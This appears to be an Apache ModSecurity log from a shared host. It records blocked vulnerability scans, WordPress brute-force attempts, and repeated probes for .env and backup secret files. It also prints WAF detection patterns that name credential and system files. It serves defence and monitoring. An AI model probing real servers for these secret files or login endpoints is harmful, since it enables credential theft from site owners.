[Tue May 26 16:12:36.928402 2026] [security2:error] [pid 773493:tid 773687] [client 20.205.111.246:11025] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/doc.php"] [unique_id "ahV5HJgy-Vk4jSdqTCRZbwAAAMU"]
[Tue May 26 16:12:37.629830 2026] [security2:error] [pid 773493:tid 773716] [client 20.205.111.246:11057] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/elp.php"] [unique_id "ahV5HZgy-Vk4jSdqTCRZggAAAOI"]
[Tue May 26 16:12:38.083480 2026] [security2:error] [pid 773493:tid 773672] [client 202.46.68.231:50821] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "mosykay.com"] [uri "/wp-comments-post.php"] [unique_id "ahV5Hpgy-Vk4jSdqTCRZkgAAALY"]
[Tue May 26 16:12:38.263128 2026] [security2:error] [pid 773493:tid 773656] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5HZgy-Vk4jSdqTCRZigAAAKY"]
[Tue May 26 16:12:38.351157 2026] [security2:error] [pid 773493:tid 773718] [client 146.174.181.221:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5HZgy-Vk4jSdqTCRZjQAAAOQ"]
[Tue May 26 16:12:38.394610 2026] [security2:error] [pid 773493:tid 773630] [client 20.205.111.246:10097] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/Exception-class.php"] [unique_id "ahV5Hpgy-Vk4jSdqTCRZmQAAAIw"]
[Tue May 26 16:12:38.463917 2026] [security2:error] [pid 773493:tid 773672] [client 202.46.68.231:50821] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "302"] [hostname "mosykay.com"] [uri "/wp-comments-post.php"] [unique_id "ahV5Hpgy-Vk4jSdqTCRZkgAAALY"]
[Tue May 26 16:12:38.463957 2026] [security2:error] [pid 773493:tid 773672] [client 202.46.68.231:50821] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "mosykay.com"] [uri "/wp-comments-post.php"] [unique_id "ahV5Hpgy-Vk4jSdqTCRZkgAAALY"]
[Tue May 26 16:12:39.098756 2026] [security2:error] [pid 773493:tid 773719] [client 20.205.111.246:10050] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/ee.php"] [unique_id "ahV5H5gy-Vk4jSdqTCRZrAAAAOU"]
[Tue May 26 16:12:39.808282 2026] [security2:error] [pid 773493:tid 773660] [client 20.205.111.246:3167] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/edit.php"] [unique_id "ahV5H5gy-Vk4jSdqTCRZxAAAAKo"]
[Tue May 26 16:12:40.524242 2026] [security2:error] [pid 773493:tid 773690] [client 20.205.111.246:3507] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/f35.php"] [unique_id "ahV5IJgy-Vk4jSdqTCRZ4AAAAMg"]
[Tue May 26 16:12:40.546643 2026] [security2:error] [pid 773493:tid 773635] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5IJgy-Vk4jSdqTCRZzQAAAJE"]
[Tue May 26 16:12:41.977636 2026] [security2:error] [pid 773493:tid 773734] [client 20.205.111.246:8213] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/fff.php"] [unique_id "ahV5IZgy-Vk4jSdqTCRZ-AAAAPQ"]
[Tue May 26 16:12:42.454212 2026] [security2:error] [pid 773493:tid 773653] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5Ipgy-Vk4jSdqTCRZ-wAAAKM"]
[Tue May 26 16:12:42.699105 2026] [security2:error] [pid 773493:tid 773739] [client 20.205.111.246:10778] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/ff1.php"] [unique_id "ahV5Ipgy-Vk4jSdqTCRaAgAAAPk"]
[Tue May 26 16:12:43.446675 2026] [security2:error] [pid 773493:tid 773709] [client 20.205.111.246:3486] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/flower.php"] [unique_id "ahV5I5gy-Vk4jSdqTCRaDwAAANs"]
[Tue May 26 16:12:43.663744 2026] [security2:error] [pid 773493:tid 773593] [remote 154.66.198.148:39680] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.198.66.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahV5I5gy-Vk4jSdqTCRaEAAAiWM"]
[Tue May 26 16:12:44.134732 2026] [security2:error] [pid 773493:tid 773651] [client 106.219.85.83:5140] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV5I5gy-Vk4jSdqTCRaHwAAAKE"]
[Tue May 26 16:12:44.134915 2026] [security2:error] [pid 773493:tid 773651] [client 106.219.85.83:5140] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV5I5gy-Vk4jSdqTCRaHwAAAKE"]
[Tue May 26 16:12:44.143054 2026] [security2:error] [pid 773493:tid 773696] [client 20.205.111.246:3174] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/file.php"] [unique_id "ahV5JJgy-Vk4jSdqTCRaJwAAAM4"]
[Tue May 26 16:12:44.746340 2026] [security2:error] [pid 773493:tid 773582] [remote 45.148.10.5:39782] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5JJgy-Vk4jSdqTCRaKwAA6Vg"]
[Tue May 26 16:12:44.755919 2026] [security2:error] [pid 773493:tid 773688] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5JJgy-Vk4jSdqTCRaLgAAAMY"]
[Tue May 26 16:12:44.921282 2026] [security2:error] [pid 773493:tid 773685] [client 20.205.111.246:4675] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/goods.php"] [unique_id "ahV5JJgy-Vk4jSdqTCRaNgAAAMM"]
[Tue May 26 16:12:45.285456 2026] [security2:error] [pid 773493:tid 773495] [remote 45.148.10.5:39782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.ndequipments.com"] [uri "/.env"] [unique_id "ahV5JZgy-Vk4jSdqTCRaQAABBAE"]
[Tue May 26 16:12:45.665709 2026] [security2:error] [pid 773493:tid 773673] [client 20.205.111.246:4720] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/g.php"] [unique_id "ahV5JZgy-Vk4jSdqTCRaTAAAALc"]
[Tue May 26 16:12:45.716796 2026] [security2:error] [pid 773493:tid 773501] [remote 45.148.10.5:39782] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5JZgy-Vk4jSdqTCRaTgAA7Ac"]
[Tue May 26 16:12:46.052012 2026] [security2:error] [pid 773493:tid 773715] [client 103.44.52.196:46598] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV5Jpgy-Vk4jSdqTCRaVQAAAOE"]
[Tue May 26 16:12:46.052105 2026] [security2:error] [pid 773493:tid 773715] [client 103.44.52.196:46598] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV5Jpgy-Vk4jSdqTCRaVQAAAOE"]
[Tue May 26 16:12:46.056471 2026] [security2:error] [pid 773493:tid 773631] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5JZgy-Vk4jSdqTCRaSQAAAI0"]
[Tue May 26 16:12:46.166967 2026] [security2:error] [pid 773493:tid 773677] [client 45.148.10.5:39782] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5Jpgy-Vk4jSdqTCRaWQAAu10"]
[Tue May 26 16:12:46.316119 2026] [security2:error] [pid 773493:tid 773657] [client 20.205.111.246:8215] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/hplfuns.php"] [unique_id "ahV5Jpgy-Vk4jSdqTCRaXQAAAKc"]
[Tue May 26 16:12:46.403954 2026] [security2:error] [pid 773493:tid 773528] [remote 74.7.241.58:42120] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahV5Jpgy-Vk4jSdqTCRaXgAAviI"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/wpforms-lite/src/Migrations
[Tue May 26 16:12:46.716765 2026] [security2:error] [pid 773493:tid 773625] [client 45.148.10.5:39782] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5Jpgy-Vk4jSdqTCRaZwAAhwY"]
[Tue May 26 16:12:47.065672 2026] [security2:error] [pid 773493:tid 773659] [client 20.205.111.246:12314] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/ioxi-o.php"] [unique_id "ahV5J5gy-Vk4jSdqTCRaagAAAKk"]
[Tue May 26 16:12:47.077403 2026] [security2:error] [pid 773493:tid 773670] [client 45.148.10.5:39782] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5J5gy-Vk4jSdqTCRaaQAAtCk"]
[Tue May 26 16:12:47.409641 2026] [security2:error] [pid 773493:tid 773722] [client 45.148.10.5:39782] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5J5gy-Vk4jSdqTCRadgAA6B4"]
[Tue May 26 16:12:47.726043 2026] [security2:error] [pid 773493:tid 773652] [client 45.148.10.5:39782] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5J5gy-Vk4jSdqTCRagAAAohQ"]
[Tue May 26 16:12:47.778478 2026] [security2:error] [pid 773493:tid 773681] [client 20.205.111.246:3554] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/in.php"] [unique_id "ahV5J5gy-Vk4jSdqTCRahAAAAL8"]
[Tue May 26 16:12:48.009274 2026] [security2:error] [pid 773493:tid 773544] [remote 45.148.10.5:39782] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5J5gy-Vk4jSdqTCRaiwAAzTI"]
[Tue May 26 16:12:48.174552 2026] [security2:error] [pid 773493:tid 773713] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5J5gy-Vk4jSdqTCRagwAAAN8"]
[Tue May 26 16:12:48.431580 2026] [security2:error] [pid 773493:tid 773624] [client 45.148.10.5:39782] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5KJgy-Vk4jSdqTCRakwAAhng"]
[Tue May 26 16:12:48.435861 2026] [security2:error] [pid 773493:tid 773710] [client 20.205.111.246:3195] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/info.php"] [unique_id "ahV5KJgy-Vk4jSdqTCRalwAAANw"]
[Tue May 26 16:12:49.021669 2026] [security2:error] [pid 773493:tid 773688] [client 45.148.10.5:39782] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5KJgy-Vk4jSdqTCRapQAAxhw"]
[Tue May 26 16:12:49.177691 2026] [security2:error] [pid 773493:tid 773649] [client 20.205.111.246:12302] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/inputs.php"] [unique_id "ahV5KZgy-Vk4jSdqTCRaqQAAAJ8"]
[Tue May 26 16:12:49.586196 2026] [security2:error] [pid 773493:tid 773640] [client 45.148.10.5:39782] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mail.ndequipments.com"] [uri "/index.php"] [unique_id "ahV5KZgy-Vk4jSdqTCRaswAAlg4"]
[Tue May 26 16:12:49.870971 2026] [security2:error] [pid 773493:tid 773671] [client 20.205.111.246:3197] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/item.php"] [unique_id "ahV5KZgy-Vk4jSdqTCRaugAAALU"]
[Tue May 26 16:12:50.048237 2026] [security2:error] [pid 773493:tid 773621] [remote 45.148.10.5:39782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "mail.ndequipments.com"] [uri "/.env.backup"] [unique_id "ahV5Kpgy-Vk4jSdqTCRawQAAt38"]
[Tue May 26 16:12:50.513546 2026] [security2:error] [pid 773493:tid 773612] [remote 45.148.10.5:39782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "mail.ndequipments.com"] [uri "/.env.old"] [unique_id "ahV5Kpgy-Vk4jSdqTCRaywAAy3Y"]
[Tue May 26 16:12:50.524903 2026] [security2:error] [pid 773493:tid 773747] [client 20.205.111.246:1305] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/k.php"] [unique_id "ahV5Kpgy-Vk4jSdqTCRazAAAAQE"]
[Tue May 26 16:12:50.698858 2026] [security2:error] [pid 773493:tid 773713] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5Kpgy-Vk4jSdqTCRayQAAAN8"]
[Tue May 26 16:12:50.922471 2026] [security2:error] [pid 773493:tid 773620] [remote 45.148.10.5:39782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "mail.ndequipments.com"] [uri "/.env.bak"] [unique_id "ahV5Kpgy-Vk4jSdqTCRa2AAA6X4"]
[Tue May 26 16:12:50.934183 2026] [security2:error] [pid 773493:tid 773695] [client 23.158.233.124:62564] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahV5Kpgy-Vk4jSdqTCRaxAAAAM0"], referer: https://www.cagmedya.com/web-tasarim/
[Tue May 26 16:12:51.216784 2026] [security2:error] [pid 773493:tid 773698] [client 20.205.111.246:6163] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/license.php"] [unique_id "ahV5K5gy-Vk4jSdqTCRa3QAAANA"]
[Tue May 26 16:12:51.380871 2026] [security2:error] [pid 773493:tid 773590] [remote 45.148.10.5:39782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.ndequipments.com"] [uri "/config/.env"] [unique_id "ahV5K5gy-Vk4jSdqTCRa5AAAw2A"]
[Tue May 26 16:12:51.614367 2026] [security2:error] [pid 773493:tid 773605] [remote 167.172.25.98:46854] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.25.172.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahV5K5gy-Vk4jSdqTCRa5QAA8W8"]
[Tue May 26 16:12:51.871825 2026] [security2:error] [pid 773493:tid 773672] [client 20.205.111.246:1114] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.naranjeehirjee.com.md-74.webhostbox.net"] [uri "/load.php"] [unique_id "ahV5K5gy-Vk4jSdqTCRa6AAAALY"]
[Tue May 26 16:12:52.230664 2026] [security2:error] [pid 773493:tid 773511] [remote 45.148.10.5:39782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.ndequipments.com"] [uri "/app/.env"] [unique_id "ahV5LJgy-Vk4jSdqTCRa9wAA5xE"]
[Tue May 26 16:12:52.552284 2026] [security2:error] [pid 773493:tid 773497] [remote 45.148.10.5:39782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.ndequipments.com"] [uri "/src/.env"] [unique_id "ahV5LJgy-Vk4jSdqTCRbAgAAiQM"]
